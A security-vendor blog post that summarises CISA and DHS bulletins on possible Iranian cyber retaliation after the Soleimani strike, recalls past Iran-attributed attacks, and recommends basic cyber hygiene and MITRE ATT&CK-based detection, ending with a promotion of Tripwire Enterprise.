Following the recent U.S. operation in Iraq which resulted in the killing of Iranian General Qassem Soleimani, Iran warned that it will retaliate. Although the international community and both involved countries have taken steps to deescalate the crisis, it is always prudent to stay alert and continually update your cybersecurity programs regardless of whether the opponent is a state actor or just a common cybercriminal. That is the key message of two security bulletins issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the DHS National Terrorism Advisory System. More specifically, CISA recommends that organizations adopt a state of heightened awareness, increase organizational vigilance, confirm reporting processes, and exercise organizational incident response plans. At the same time, DHS recommends that organizations be prepared for cyber disruptions, suspicious emails, and network delays and that they implement basic cyber hygiene practices.
Background Information on Iranian Cyber Activity
DHS notes that “at this time we have no information indicating a specific, credible threat to the Homeland.” However, “Iran is capable, at a minimum, of carrying out attacks with temporary disruptive effects against critical infrastructure in the United States,” states the DHS security bulletin. Further, CISA states that Iran continues “to engage in more “conventional” activities ranging from website defacement, distributed denial of service (DDoS) attacks, and theft of personally identifiable information (PII), but they have also demonstrated a willingness to push the boundaries of their activities, which include destructive wiper malware and, potentially, cyber-enabled kinetic attacks.” Offensive cyber operations targeting a variety of industries and organizations, including financial services, energy, government facilities, chemical, healthcare, critical manufacturing, communications, and the defense industrial base, have been attributed or allegedly attributed to the Iranian government, says the CISA alert bulletin. As outlined in the bulletin, the most notable high-profile attacks attributed to Iran are the following:
- Late 2011 to mid-2013: DDoS attacks against 46 victims, primarily in the U.S financial sector, which resulted prevented customers from accessing their accounts and cost the banks millions of dollars in remediation.
- August/September 2013: Security breach at a critical infrastructure facility. An Iranian was accused of illegally accessing the Supervisory Control and Data Acquisition (SCADA) systems of the Bowman Dam located in Rye, New York, and obtaining information regarding the status and operation of the dam.
- February 2014: Breach of Sands Las Vegas Corporation in Las Vegas where customer data including credit card details, Social Security Numbers, and driver’s license numbers were stolen and, according to a Bloomberg report, some computers were wiped.
- 2013 to 2017: Nine Iranian nationals allegedly stole more than 31 terabytes of documents and data from “144 U.S. universities, 176 universities across 21 foreign countries, 47 domestic and foreign private sector companies, the U.S. Department of Labor, the Federal Energy Regulatory Commission, the State of Hawaii, the State of Indiana, the United Nations, and the United Nations Children’s Fund.”
As Kate O'Flaherty writes in her article on Forbes, some feel that cyber operations are not a viable retaliation option because it “is not a strong enough revenge message for the Iranian people.” James Shires, Assistant Professor at the Institute for Security and Global Affairs, University of Leiden and non-resident research fellow with the Cyber Project at the Belfer Center for Science and International Affairs, Harvard Kennedy School, is one of them.
It remains to be seen whether Iran will indeed use cyber-attacks to retaliate against the United States.
How to Mitigate Threats
That uncertainty doesn’t mean organizations can’t take steps to strengthen their digital security in general. Regardless of whether the threat is coming from Iran or any other state actor or by your next-door criminal, it is always advisable to be prepared and to be vigilant. The headlines are awash with news of security breaches and incidents involving all kinds of organizations from critical infrastructure to schools, hospitals, and bicycle manufacturers. Being negligible and ignorant is not a wise thing to do. To be in line with the CISA and DHS general recommendations, organizations should discuss and set aside budget for employee training, awareness and incident response planning. Apart from cultivating a security culture with your organization, it is important to take advantage of the available threat intelligence and prepare yourself accordingly. CISA has provided recommendations that span from basic hygiene practices to mitigation and detection of known Iran-attributed APT techniques. Your basic cyber hygiene practices should include the following:
- Disable all unnecessary ports and protocols.
- Enhance monitoring of network and email traffic.
- Patch externally facing equipment.
- Log and limit usage of PowerShell.
- Ensure backups are up to date and stored in an easily retrievable location.
Moving beyond basic fortification of your organization, it is highly advisable to employ mitigation and detection best practices to mitigate known APT techniques. “Advanced Persistent Threat groups, by definition, are going to be more funded and skilled than other adversaries seen on the internet,” says Travis Smith, Manager, Security Compliance Solutions at Tripwire. As APT activities become more and more difficult to track and detect, there is an emerging need to raise the detection capabilities of organizations. “There’s a common misperception that attackers only need to be right once to get in, while defenders need to be right all the time,” says Smith. “In fact, good defenders only need to be right once to track down the most sophisticated attackers. A sophisticated attack is going to chain together multiple techniques in order to achieve the adversary’s goal. This means there are many moving parts and points of contact with IT systems which are prime targets to spot adversarial behaviors. Raising detection maturity from looking for tools to looking for techniques, increases the chances of detection.” Luckily, attackers are humans, and therefore, their techniques can be predicted by taking advantage of actionable threat intelligence, which can help us be prepared and make the attackers’ lives difficult. What better tool to use than MITRE ATT&CK? In fact, the even CISA security bulletin includes indicators based on the MITRE ATT&CK framework. The framework is a curated knowledge base and model for cyber adversary behavior which reflects the various phases of an adversary’s lifecycle and the platforms they are known to target. “By leveraging something like MITRE ATT&CK, which describes in detail multiple different techniques, we can begin tracing how an attacker may target our systems,” notes Smith. “You don’t need to have perfect coverage of every technique; in fact, it is probably cost-prohibitive to do so. Having detection capabilities across multiple techniques will be good enough for an attacker to trip over.” ATT&CK can help organizations quickly detect cyber threats and identify and categorize cyber adversary behaviors. This insight allows a tailored response to a cyber breach and a recovery plan specific to the breach, saving valuable time and resources. “By tracking APT groups, we can know what techniques they want to leverage more heavily. We can place mitigating steps for those techniques, which can force the attacker out of their comfort zone. When this happens, an attacker can make mistakes. When an attacker makes a mistake, it shifts the balance of power in favor of the defender,” concludes Travis Smith. It is never a bad idea to use current events to ramp up attention being paid to cybersecurity. Tripwire Enterprise can identify the techniques, tactics and procedures (TTPs) outlined in MITRE’s ATT&CK model and can help your organization detect and protect against behaviors associated with cybercrime. Using Tripwire Enterprise organizations can build better preventative measures and be in a position to identify a breach sooner by focusing on the behaviors of cyber attackers instead of just on the specific tools or malware they use.